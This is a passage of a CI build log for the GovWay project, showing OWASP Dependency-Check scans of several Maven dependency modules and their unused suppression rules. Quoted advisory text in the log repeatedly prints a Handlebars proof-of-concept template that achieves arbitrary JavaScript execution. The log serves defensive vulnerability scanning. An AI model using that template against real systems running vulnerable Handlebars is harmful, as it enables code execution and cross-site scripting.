dependency:3.8.1:copy-dependencies (copy-dependencies) @ org.openspcoop2.spring-ldap --- 17:42:49 [INFO] 17:42:49 [INFO] --- antrun:3.1.0:run (sleep-for-a-while) @ org.openspcoop2.spring-ldap --- 17:42:49 [INFO] Executing tasks 17:42:54 [INFO] Executed tasks 17:42:54 [INFO] 17:42:54 [INFO] --- dependency-check:12.2.0:aggregate (check owasp) @ org.openspcoop2.spring-ldap --- 17:42:54 [INFO] Checking for updates 17:42:54 [INFO] Skipping the NVD API Update as it was completed within the last 240 minutes 17:42:54 [INFO] Skipping Known Exploited Vulnerabilities update check since last check was within 24 hours. 17:42:54 [INFO] Check for updates complete (93 ms) 17:42:55 [INFO] 17:42:55 17:42:55 Dependency-Check is an open source tool performing a best effort analysis of 3rd party dependencies; false positives and false negatives may exist in the analysis performed by the tool. Use of the tool and the reporting provided constitutes acceptance for use in an AS IS condition, and there are NO warranties, implied or otherwise, with regard to the analysis or its use. Any use of the tool and the reporting provided is at the user's risk. In no event shall the copyright holder or OWASP be held liable for any damages whatsoever arising out of or in connection with the use of this tool, the analysis performed, or the resulting report. 17:42:55 17:42:55 17:42:55 About ODC: https://dependency-check.github.io/DependencyCheck/general/internals.html 17:42:55 False Positives: https://dependency-check.github.io/DependencyCheck/general/suppression.html 17:42:55 17:42:55 17:42:55 [INFO] Analysis Started 17:42:55 [INFO] Finished Archive Analyzer (0 seconds) 17:42:55 [INFO] Finished File Name Analyzer (0 seconds) 17:42:55 [INFO] Finished Jar Analyzer (0 seconds) 17:42:55 [INFO] Finished Dependency Merging Analyzer (0 seconds) 17:42:55 [INFO] Finished Hint Analyzer (0 seconds) 17:42:55 [INFO] Finished Version Filter Analyzer (0 seconds) 17:42:58 [INFO] Created CPE Index (2 seconds) 17:42:58 [INFO] Finished CPE Analyzer (2 seconds) 17:42:58 [INFO] Finished False Positive Analyzer (0 seconds) 17:42:58 [INFO] Finished NVD CVE Analyzer (0 seconds) 17:42:58 [INFO] Finished Vulnerability Suppression Analyzer (0 seconds) 17:42:58 [INFO] Finished Known Exploited Vulnerability Analyzer (0 seconds) 17:42:58 [INFO] Finished Dependency Bundling Analyzer (0 seconds) 17:42:58 [INFO] Suppression Rule had zero matches: SuppressionRule{filePath=PropertyType{value=.*swagger-codegen-cli-3.0.46-gov4j-1.jar.*, regex=true, caseSensitive=false},cvssBelow={10.0,}} 17:42:58 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=A prototype pollution vulnerability in handlebars is exploitable if an attacker can control the template, regex=false, caseSensitive=false},}} 17:42:58 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=Denial of service, regex=false, caseSensitive=false},}} 17:42:58 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=Prototype pollution, regex=false, caseSensitive=false},}} 17:42:58 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=Disallow calling helperMissing and blockHelperMissing directly, regex=false, caseSensitive=false},}} 17:42:58 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=handlebars issue: 1495, regex=false, caseSensitive=false},}} 17:42:58 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=handlebars issue: 1633, regex=false, caseSensitive=false},}} 17:42:58 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=Affected versions of `handlebars` are vulnerable to Denial of Service. The package's parser may be forced into an endless loop while processing specially-crafted templates. This may allow attackers to exhaust system resources leading to Denial of Service. 17:42:58 17:42:58 17:42:58 ## Recommendation 17:42:58 17:42:58 Upgrade to version 4.4.5 or later., regex=false, caseSensitive=false},}} 17:42:58 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/jquery@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=jQuery 1.x and 2.x are End-of-Life and no longer receiving security updates, regex=false, caseSensitive=false},}} 17:42:58 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=Versions of `handlebars` prior to 3.0.8 or 4.5.2 are vulnerable to Arbitrary Code Execution. The package's lookup helper fails to properly validate templates, allowing attackers to submit templates that execute arbitrary JavaScript in the system. It can be used to run arbitrary code in a server processing Handlebars templates or on a victim's browser (effectively serving as Cross-Site Scripting). 17:42:58 17:42:58 The following template can be used to demonstrate the vulnerability: 17:42:58 ```{{#with "constructor"}} 17:42:58 {{#with split as |a|}} 17:42:58 {{pop (push "alert('Vulnerable Handlebars JS');")}} 17:42:58 {{#with (concat (lookup join (slice 0 1)))}} 17:42:58 {{#each (slice 2 3)}} 17:42:58 {{#with (apply 0 a)}} 17:42:58 {{.}} 17:42:58 {{/with}} 17:42:58 {{/each}} 17:42:58 {{/with}} 17:42:58 {{/with}} 17:42:58 {{/with}}``` 17:42:58 17:42:58 17:42:58 ## Recommendation 17:42:58 17:42:58 Upgrade to version 3.0.8, 4.5.2 or later., regex=false, caseSensitive=false},}} 17:42:58 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=Versions of `handlebars` prior to 3.0.8 or 4.5.3 are vulnerable to Arbitrary Code Execution. The package's lookup helper fails to properly validate templates, allowing attackers to submit templates that execute arbitrary JavaScript in the system. It is due to an incomplete fix for a [previous issue](https://www.npmjs.com/advisories/1316). This vulnerability can be used to run arbitrary code in a server processing Handlebars templates or on a victim's browser (effectively serving as Cross-Site Scripting), regex=false, caseSensitive=false},}} 17:42:58 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/jquery@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=jquery issue: 162, regex=false, caseSensitive=false},}} 17:42:58 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/jquery@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=jquery issue: 11974, regex=false, caseSensitive=false},}} 17:42:58 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:maven/xerces/xercesImpl@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=CVE-2017-10355, regex=false, caseSensitive=false},}} 17:42:58 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:maven/org\.apache\.commons/commons-fileupload2-core@.*$, regex=true, caseSensitive=false},cve={CVE-2025-48976,}} 17:42:58 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:maven/org\.apache\.commons/commons-fileupload2-jakarta@.*$, regex=true, caseSensitive=false},cpe={PropertyType{value=cpe:/a:apache:commons_fileupload, regex=false, caseSensitive=false},}} 17:42:58 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/DOMPurify@.*$, regex=true, caseSensitive=false},cve={CVE-2025-15599,}} 17:42:58 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/DOMPurify@.*$, regex=true, caseSensitive=false},cve={CVE-2026-0540,}} 17:42:58 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:maven/org\.apache\.pdfbox/pdfbox@.*$, regex=true, caseSensitive=false},cve={CVE-2026-23907,}} 17:42:58 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:maven/org\.apache\.pdfbox/pdfbox-io@.*$, regex=true, caseSensitive=false},cve={CVE-2026-23907,}} 17:42:58 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:maven/com\.github\.dhorions/boxable@.*$, regex=true, caseSensitive=false},cve={CVE-2016-2175,}} 17:42:58 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:maven/com\.github\.dhorions/boxable@.*$, regex=true, caseSensitive=false},cve={CVE-2018-8036,}} 17:42:58 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:maven/com\.github\.dhorions/boxable@.*$, regex=true, caseSensitive=false},cve={CVE-2018-11797,}} 17:42:58 [INFO] Finished Unused Suppression Rule Analyzer (0 seconds) 17:42:58 [INFO] Analysis Complete (3 seconds) 17:42:58 [INFO] Writing XML report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-report.xml 17:42:58 [INFO] Writing HTML report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-report.html 17:42:58 [INFO] Writing JSON report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-report.json 17:42:58 [INFO] Writing CSV report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-report.csv 17:42:58 [INFO] Writing SARIF report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-report.sarif 17:42:58 [INFO] Writing JENKINS report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-jenkins.html 17:42:58 [INFO] Writing JUNIT report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-junit.xml 17:42:58 [INFO] Writing GITLAB report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-gitlab.json 17:42:58 [INFO] 17:42:58 [INFO] ----------< org.openspcoop2:org.openspcoop2.spring-security >----------- 17:42:58 [INFO] Building dependencies.spring-security 1.0 [30/67] 17:42:58 [INFO] from mvn/dependencies/spring-security/pom.xml 17:42:58 [INFO] --------------------------------[ pom ]--------------------------------- 17:42:58 [INFO] 17:42:58 [INFO] --- clean:3.4.0:clean (clean) @ org.openspcoop2.spring-security --- 17:42:58 [INFO] Deleting /var/lib/jenkins/workspace/GovWay/lib/spring-security (includes = [*.jar], excludes = []) 17:42:58 [INFO] 17:42:58 [INFO] --- dependency:3.8.1:copy-dependencies (copy-dependencies) @ org.openspcoop2.spring-security --- 17:42:58 [INFO] 17:42:58 [INFO] --- antrun:3.1.0:run (sleep-for-a-while) @ org.openspcoop2.spring-security --- 17:42:58 [INFO] Executing tasks 17:43:03 [INFO] Executed tasks 17:43:03 [INFO] 17:43:03 [INFO] --- dependency-check:12.2.0:aggregate (check owasp) @ org.openspcoop2.spring-security --- 17:43:03 [INFO] Checking for updates 17:43:03 [INFO] Skipping the NVD API Update as it was completed within the last 240 minutes 17:43:04 [INFO] Skipping Known Exploited Vulnerabilities update check since last check was within 24 hours. 17:43:04 [INFO] Check for updates complete (98 ms) 17:43:04 [INFO] 17:43:04 17:43:04 Dependency-Check is an open source tool performing a best effort analysis of 3rd party dependencies; false positives and false negatives may exist in the analysis performed by the tool. Use of the tool and the reporting provided constitutes acceptance for use in an AS IS condition, and there are NO warranties, implied or otherwise, with regard to the analysis or its use. Any use of the tool and the reporting provided is at the user's risk. In no event shall the copyright holder or OWASP be held liable for any damages whatsoever arising out of or in connection with the use of this tool, the analysis performed, or the resulting report. 17:43:04 17:43:04 17:43:04 About ODC: https://dependency-check.github.io/DependencyCheck/general/internals.html 17:43:04 False Positives: https://dependency-check.github.io/DependencyCheck/general/suppression.html 17:43:04 17:43:04 17:43:04 [INFO] Analysis Started 17:43:04 [INFO] Finished Archive Analyzer (0 seconds) 17:43:04 [INFO] Finished File Name Analyzer (0 seconds) 17:43:04 [INFO] Finished Jar Analyzer (0 seconds) 17:43:04 [INFO] Finished Dependency Merging Analyzer (0 seconds) 17:43:04 [INFO] Finished Hint Analyzer (0 seconds) 17:43:04 [INFO] Finished Version Filter Analyzer (0 seconds) 17:43:08 [INFO] Created CPE Index (3 seconds) 17:43:08 [INFO] Finished CPE Analyzer (3 seconds) 17:43:08 [INFO] Finished False Positive Analyzer (0 seconds) 17:43:08 [INFO] Finished NVD CVE Analyzer (0 seconds) 17:43:08 [INFO] Finished RetireJS Analyzer (0 seconds) 17:43:08 [INFO] Finished Vulnerability Suppression Analyzer (0 seconds) 17:43:08 [INFO] Finished Known Exploited Vulnerability Analyzer (0 seconds) 17:43:09 [INFO] Finished Dependency Bundling Analyzer (0 seconds) 17:43:09 [INFO] Suppression Rule had zero matches: SuppressionRule{filePath=PropertyType{value=.*swagger-codegen-cli-3.0.46-gov4j-1.jar.*, regex=true, caseSensitive=false},cvssBelow={10.0,}} 17:43:09 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=A prototype pollution vulnerability in handlebars is exploitable if an attacker can control the template, regex=false, caseSensitive=false},}} 17:43:09 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=Denial of service, regex=false, caseSensitive=false},}} 17:43:09 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=Prototype pollution, regex=false, caseSensitive=false},}} 17:43:09 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=Disallow calling helperMissing and blockHelperMissing directly, regex=false, caseSensitive=false},}} 17:43:09 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=handlebars issue: 1495, regex=false, caseSensitive=false},}} 17:43:09 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=handlebars issue: 1633, regex=false, caseSensitive=false},}} 17:43:09 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=Affected versions of `handlebars` are vulnerable to Denial of Service. The package's parser may be forced into an endless loop while processing specially-crafted templates. This may allow attackers to exhaust system resources leading to Denial of Service. 17:43:09 17:43:09 17:43:09 ## Recommendation 17:43:09 17:43:09 Upgrade to version 4.4.5 or later., regex=false, caseSensitive=false},}} 17:43:09 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/jquery@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=jQuery 1.x and 2.x are End-of-Life and no longer receiving security updates, regex=false, caseSensitive=false},}} 17:43:09 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=Versions of `handlebars` prior to 3.0.8 or 4.5.2 are vulnerable to Arbitrary Code Execution. The package's lookup helper fails to properly validate templates, allowing attackers to submit templates that execute arbitrary JavaScript in the system. It can be used to run arbitrary code in a server processing Handlebars templates or on a victim's browser (effectively serving as Cross-Site Scripting). 17:43:09 17:43:09 The following template can be used to demonstrate the vulnerability: 17:43:09 ```{{#with "constructor"}} 17:43:09 {{#with split as |a|}} 17:43:09 {{pop (push "alert('Vulnerable Handlebars JS');")}} 17:43:09 {{#with (concat (lookup join (slice 0 1)))}} 17:43:09 {{#each (slice 2 3)}} 17:43:09 {{#with (apply 0 a)}} 17:43:09 {{.}} 17:43:09 {{/with}} 17:43:09 {{/each}} 17:43:09 {{/with}} 17:43:09 {{/with}} 17:43:09 {{/with}}``` 17:43:09 17:43:09 17:43:09 ## Recommendation 17:43:09 17:43:09 Upgrade to version 3.0.8, 4.5.2 or later., regex=false, caseSensitive=false},}} 17:43:09 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=Versions of `handlebars` prior to 3.0.8 or 4.5.3 are vulnerable to Arbitrary Code Execution. The package's lookup helper fails to properly validate templates, allowing attackers to submit templates that execute arbitrary JavaScript in the system. It is due to an incomplete fix for a [previous issue](https://www.npmjs.com/advisories/1316). This vulnerability can be used to run arbitrary code in a server processing Handlebars templates or on a victim's browser (effectively serving as Cross-Site Scripting), regex=false, caseSensitive=false},}} 17:43:09 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/jquery@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=jquery issue: 162, regex=false, caseSensitive=false},}} 17:43:09 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/jquery@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=jquery issue: 11974, regex=false, caseSensitive=false},}} 17:43:09 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:maven/xerces/xercesImpl@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=CVE-2017-10355, regex=false, caseSensitive=false},}} 17:43:09 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:maven/org\.apache\.commons/commons-fileupload2-core@.*$, regex=true, caseSensitive=false},cve={CVE-2025-48976,}} 17:43:09 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:maven/org\.apache\.commons/commons-fileupload2-jakarta@.*$, regex=true, caseSensitive=false},cpe={PropertyType{value=cpe:/a:apache:commons_fileupload, regex=false, caseSensitive=false},}} 17:43:09 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/DOMPurify@.*$, regex=true, caseSensitive=false},cve={CVE-2025-15599,}} 17:43:09 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/DOMPurify@.*$, regex=true, caseSensitive=false},cve={CVE-2026-0540,}} 17:43:09 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:maven/org\.apache\.pdfbox/pdfbox@.*$, regex=true, caseSensitive=false},cve={CVE-2026-23907,}} 17:43:09 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:maven/org\.apache\.pdfbox/pdfbox-io@.*$, regex=true, caseSensitive=false},cve={CVE-2026-23907,}} 17:43:09 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:maven/com\.github\.dhorions/boxable@.*$, regex=true, caseSensitive=false},cve={CVE-2016-2175,}} 17:43:09 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:maven/com\.github\.dhorions/boxable@.*$, regex=true, caseSensitive=false},cve={CVE-2018-8036,}} 17:43:09 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:maven/com\.github\.dhorions/boxable@.*$, regex=true, caseSensitive=false},cve={CVE-2018-11797,}} 17:43:09 [INFO] Finished Unused Suppression Rule Analyzer (0 seconds) 17:43:09 [INFO] Analysis Complete (4 seconds) 17:43:09 [INFO] Writing XML report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-report.xml 17:43:09 [INFO] Writing HTML report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-report.html 17:43:09 [INFO] Writing JSON report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-report.json 17:43:09 [INFO] Writing CSV report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-report.csv 17:43:09 [INFO] Writing SARIF report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-report.sarif 17:43:09 [INFO] Writing JENKINS report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-jenkins.html 17:43:09 [INFO] Writing JUNIT report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-junit.xml 17:43:09 [INFO] Writing GITLAB report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-gitlab.json 17:43:09 [INFO] 17:43:09 [INFO] --------------< org.openspcoop2:org.openspcoop2.swagger >--------------- 17:43:09 [INFO] Building dependencies.swagger 1.0 [31/67] 17:43:09 [INFO] from mvn/dependencies/swagger/pom.xml 17:43:09 [INFO] --------------------------------[ pom ]--------------------------------- 17:43:09 [INFO] 17:43:09 [INFO] --- clean:3.4.0:clean (clean) @ org.openspcoop2.swagger --- 17:43:09 [INFO] Deleting /var/lib/jenkins/workspace/GovWay/lib/swagger (includes = [*.jar], excludes = []) 17:43:09 [INFO] 17:43:09 [INFO] --- dependency:3.8.1:copy-dependencies (copy-dependencies) @ org.openspcoop2.swagger --- 17:43:09 [INFO] 17:43:09 [INFO] --- antrun:3.1.0:run (delete-dependencies-override-gov4j) @ org.openspcoop2.swagger --- 17:43:09 [INFO] Executing tasks 17:43:09 [INFO] [delete] Deleting: /var/lib/jenkins/workspace/GovWay/lib/swagger/swagger-parser-v3-2.1.29.jar 17:43:09 [INFO] [delete] Deleting: /var/lib/jenkins/workspace/GovWay/lib/swagger/swagger-request-validator-core-2.44.9.jar 17:43:09 [INFO] Executed tasks 17:43:09 [INFO] 17:43:09 [INFO] --- antrun:3.1.0:run (sleep-for-a-while) @ org.openspcoop2.swagger --- 17:43:09 [INFO] Executing tasks 17:43:14 [INFO] Executed tasks 17:43:14 [INFO] 17:43:14 [INFO] --- dependency-check:12.2.0:aggregate (check owasp) @ org.openspcoop2.swagger --- 17:43:14 [INFO] Checking for updates 17:43:14 [INFO] Skipping the NVD API Update as it was completed within the last 240 minutes 17:43:14 [INFO] Skipping Known Exploited Vulnerabilities update check since last check was within 24 hours. 17:43:14 [INFO] Check for updates complete (101 ms) 17:43:15 [INFO] 17:43:15 17:43:15 Dependency-Check is an open source tool performing a best effort analysis of 3rd party dependencies; false positives and false negatives may exist in the analysis performed by the tool. Use of the tool and the reporting provided constitutes acceptance for use in an AS IS condition, and there are NO warranties, implied or otherwise, with regard to the analysis or its use. Any use of the tool and the reporting provided is at the user's risk. In no event shall the copyright holder or OWASP be held liable for any damages whatsoever arising out of or in connection with the use of this tool, the analysis performed, or the resulting report. 17:43:15 17:43:15 17:43:15 About ODC: https://dependency-check.github.io/DependencyCheck/general/internals.html 17:43:15 False Positives: https://dependency-check.github.io/DependencyCheck/general/suppression.html 17:43:15 17:43:15 17:43:15 [INFO] Analysis Started 17:43:15 [INFO] Finished Archive Analyzer (0 seconds) 17:43:15 [INFO] Finished File Name Analyzer (0 seconds) 17:43:15 [INFO] Finished Jar Analyzer (0 seconds) 17:43:15 [INFO] Finished Dependency Merging Analyzer (0 seconds) 17:43:15 [INFO] Finished Hint Analyzer (0 seconds) 17:43:15 [INFO] Finished Version Filter Analyzer (0 seconds) 17:43:19 [INFO] Created CPE Index (3 seconds) 17:43:19 [INFO] Finished CPE Analyzer (3 seconds) 17:43:19 [INFO] Finished False Positive Analyzer (0 seconds) 17:43:19 [INFO] Finished NVD CVE Analyzer (0 seconds) 17:43:33 [INFO] Finished RetireJS Analyzer (13 seconds) 17:43:33 [INFO] Finished Vulnerability Suppression Analyzer (0 seconds) 17:43:33 [INFO] Finished Known Exploited Vulnerability Analyzer (0 seconds) 17:43:33 [INFO] Finished Dependency Bundling Analyzer (0 seconds) 17:43:33 [INFO] Suppression Rule had zero matches: SuppressionRule{filePath=PropertyType{value=.*swagger-codegen-cli-3.0.46-gov4j-1.jar.*, regex=true, caseSensitive=false},cvssBelow={10.0,}} 17:43:33 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=A prototype pollution vulnerability in handlebars is exploitable if an attacker can control the template, regex=false, caseSensitive=false},}} 17:43:33 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=Denial of service, regex=false, caseSensitive=false},}} 17:43:33 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=Prototype pollution, regex=false, caseSensitive=false},}} 17:43:33 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=Disallow calling helperMissing and blockHelperMissing directly, regex=false, caseSensitive=false},}} 17:43:33 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=handlebars issue: 1495, regex=false, caseSensitive=false},}} 17:43:33 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=handlebars issue: 1633, regex=false, caseSensitive=false},}} 17:43:33 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=Affected versions of `handlebars` are vulnerable to Denial of Service. The package's parser may be forced into an endless loop while processing specially-crafted templates. This may allow attackers to exhaust system resources leading to Denial of Service. 17:43:33 17:43:33 17:43:33 ## Recommendation 17:43:33 17:43:33 Upgrade to version 4.4.5 or later., regex=false, caseSensitive=false},}} 17:43:33 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/jquery@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=jQuery 1.x and 2.x are End-of-Life and no longer receiving security updates, regex=false, caseSensitive=false},}} 17:43:33 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=Versions of `handlebars` prior to 3.0.8 or 4.5.2 are vulnerable to Arbitrary Code Execution. The package's lookup helper fails to properly validate templates, allowing attackers to submit templates that execute arbitrary JavaScript in the system. It can be used to run arbitrary code in a server processing Handlebars templates or on a victim's browser (effectively serving as Cross-Site Scripting). 17:43:33 17:43:33 The following template can be used to demonstrate the vulnerability: 17:43:33 ```{{#with "constructor"}} 17:43:33 {{#with split as |a|}} 17:43:33 {{pop (push "alert('Vulnerable Handlebars JS');")}} 17:43:33 {{#with (concat (lookup join (slice 0 1)))}} 17:43:33 {{#each (slice 2 3)}} 17:43:33 {{#with (apply 0 a)}} 17:43:33 {{.}} 17:43:33 {{/with}} 17:43:33 {{/each}} 17:43:33 {{/with}} 17:43:33 {{/with}} 17:43:33 {{/with}}``` 17:43:33 17:43:33 17:43:33 ## Recommendation 17:43:33 17:43:33 Upgrade to version 3.0.8, 4.5.2 or later., regex=false, caseSensitive=false},}} 17:43:33 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=Versions of `handlebars` prior to 3.0.8 or 4.5.3 are vulnerable to Arbitrary Code Execution. The package's lookup helper fails to properly validate templates, allowing attackers to submit templates that execute arbitrary JavaScript in the system. It is due to an incomplete fix for a [previous issue](https://www.npmjs.com/advisories/1316). This vulnerability can be used to run arbitrary code in a server processing Handlebars templates or on a victim's browser (effectively serving as Cross-Site Scripting), regex=false, caseSensitive=false},}} 17:43:33 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/jquery@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=jquery issue: 162, regex=false, caseSensitive=false},}} 17:43:33 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/jquery@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=jquery issue: 11974, regex=false, caseSensitive=false},}} 17:43:33 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:maven/xerces/xercesImpl@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=CVE-2017-10355, regex=false, caseSensitive=false},}} 17:43:33 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:maven/org\.apache\.commons/commons-fileupload2-core@.*$, regex=true, caseSensitive=false},cve={CVE-2025-48976,}} 17:43:33 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:maven/org\.apache\.commons/commons-fileupload2-jakarta@.*$, regex=true, caseSensitive=false},cpe={PropertyType{value=cpe:/a:apache:commons_fileupload, regex=false, caseSensitive=false},}} 17:43:33 [INFO] Suppression Rule 